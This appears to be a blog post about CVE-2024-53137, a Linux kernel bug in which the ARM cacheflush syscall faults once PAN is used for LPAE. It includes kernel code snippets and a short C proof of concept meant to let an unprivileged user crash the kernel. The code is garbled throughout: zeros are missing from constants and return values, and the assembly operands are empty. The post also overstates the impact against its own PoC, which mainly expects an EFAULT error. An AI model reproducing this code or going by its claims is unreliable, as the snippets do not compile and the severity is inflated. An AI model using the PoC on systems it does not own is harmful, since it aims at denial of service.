CVE-2024-53137 - Breaking Down the Linux Kernel ARM Cacheflush PAN Vulnerability (with Exploit Details)

Recently, a major security issue was resolved in the Linux kernel concerning ARM processors and cache maintenance — tracked as CVE-2024-53137. This vulnerability specifically affects the cacheflush syscall, which failed after Privileged Access Never (PAN) for Large Physical Address Extension (LPAE) was rolled out. If you're running Linux on ARM hardware or develop Linux-based systems, this issue could impact both device security and reliability.

In this post, we’ll explain what went wrong, show example code, provide links to original resources, and walk through potential exploit scenarios in clear, approachable language.

What is CVE-2024-53137?

CVE-2024-53137 is a security flaw in the Linux kernel’s ARM architecture codebase. The direct cause: the cacheflush syscall began to fail after the kernel started using PAN for LPAE ARM processors.

The syscall cacheflush lets user processes trigger cache maintenance.

- After PAN was enabled for LPAE (a feature meant to stop the kernel from accidentally accessing user space memory), the cacheflush syscall suddenly started faulting (causing errors or crashes).
- This happened because the kernel didn’t re-enable temporary user access before running the cache instructions.

If attackers can trigger this in a certain way, depending on the kernel configuration, they could potentially crash the system, hang services, or (in theoretical edge cases) even escalate to arbitrary code execution — if other bugs are present.

Original References

- Kernel Patch commit
- Linux ARM Architecture Maintainers
- CVE-2024-53137 (MITRE) *(May update with details soon)*

What’s the Technical Root Cause?

The bug was introduced when PAN was added for ARM’s LPAE mode. The kernel forgot to enable user access rights (essentially, a “kernel-unlocks-user” moment) during cache maintenance. Because of PAN, memory instructions to user space fail when run in kernel mode — so the kernel cache instructions failed.

Before the fix, the kernel code looked like this

// Called as system call cacheflush(addr, len, flags);
#define SYS_cacheflush xf0002

asmlinkage int sys_cacheflush(unsigned long start, unsigned long end, unsigned int flags) {
    // ... omitted checks ...
    // *NO ENABLING of user access here*
    __asm__ __volatile__("mcr p15, , %, c7, c14, " : : "r" (start));
    // ... rest of syscall ...
}

With PAN enabled, the kernel can't access user space memory here.

The fix wraps the cache instructions between user access enable/disable macros

/// Pseudo-code for clarity

enable_user_access();  // Disables PAN, allows access to user pages

// Now safe to touch user space memory for cacheflush
__asm__ __volatile__("mcr p15, , %, c7, c14, " : : "r" (start));

disable_user_access(); // Re-enables PAN, protects kernel again

Source: See the kernel patch here.

Simple PoC: Crash the Kernel (DoS)

If your ARM kernel has this bug, any unprivileged user might trigger a kernel Oops or panic with code like:

#include <unistd.h>
#include <sys/syscall.h>
#include <stdio.h>

// On ARM, cacheflush syscall might be __ARM_NR_cacheflush (xf0002)
#ifndef __ARM_NR_cacheflush
#define __ARM_NR_cacheflush xf0002
#endif

int main() {
    void *start = (void *)x10000;
    void *end   = (void *)x20000;
    unsigned int flags = ;

    long res = syscall(__ARM_NR_cacheflush, start, end, flags);
    if (res < )
        perror("cacheflush failed"); // On affected kernels, will see EFAULT or kernel log
    return ;
}

On a bad kernel, this fails with a segmentation fault or triggers a kernel log message.

Denial-of-Service: Any user can crash the system by calling this with benign-looking parameters.

- Potential for Privilege Escalation: If combined with other bugs, kernel memory corruption could be possible. The main risk, however, is system instability.

Check your kernel version

uname -r
# If 6.7 and newer, or recent mainline/distros, check your distro security notes!

Remediation

- Kernel Upgrade: Upgrade to a Linux kernel with this patch or newer.
- Backport Patch: If you run a custom kernel/distro, apply the patch manually.
- Limit Untrusted Code: Until you patch, don’t allow untrusted userspace apps to run on ARM systems.

Conclusion

CVE-2024-53137 is a classic example of subtle kernel security bugs: a well-intentioned defense (PAN) accidentally made a basic syscall stop working. The fix is simple but essential — always re-enable user access in the kernel when needed!

Further Reading

- ARM Linux Kernel Maintainers
- Linux Kernel Hardening Project
- Upstream Patch Discussion


*(Share this post if you found it useful! For questions, leave a comment below.)*

Timeline

Published on: 12/04/2024 15:15:13 UTC
Last modified on: 12/19/2024 09:40:06 UTC